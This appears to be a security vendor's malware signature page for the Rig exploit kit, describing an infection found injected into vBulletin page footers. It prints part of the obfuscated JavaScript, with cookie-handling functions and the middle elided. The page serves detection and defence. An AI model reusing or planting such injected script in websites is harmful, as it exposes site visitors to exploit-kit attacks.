Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.rig_ek

Description: Malicious code typical for ifections related to the Rig exploit kit.

Malware may be found injected into legitimate web pages. For example the following script was found in the footer of vBulletin site pages:

<sc ript type="text/javascript">
var c3u="userid\x410​\u00381\x37\u0046B25";var yj_="30";var re_exp_decode_1,re_exp_decode_2;function igv(ejye){var tyc=document.cookie.replace(/\s/g,"").split(";");for(var it0=0;it0<tyc.length;it0++){var ffyp=tyc[it0].split("=");if(ffyp[0]==ejye){return unescape(ffyp[1]);}}return null;};function s6q(ejye,vi2,n0re){var pbum=new Date();var xg3r=pbum.getTime()+(n0re*60*60*1000);pbum.setTime(xg3r);var urnl=ejye+"="+escape(vi2)+"\x3b​\x20exp\u0069res="+pbum.toGMTString()+";...skipped...catch(d8bi){u8l=1;}}}catch(d8bi){};if(u8l==0){epzs();}};​q0pg(); 
</script>


Affecting: Any sites


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb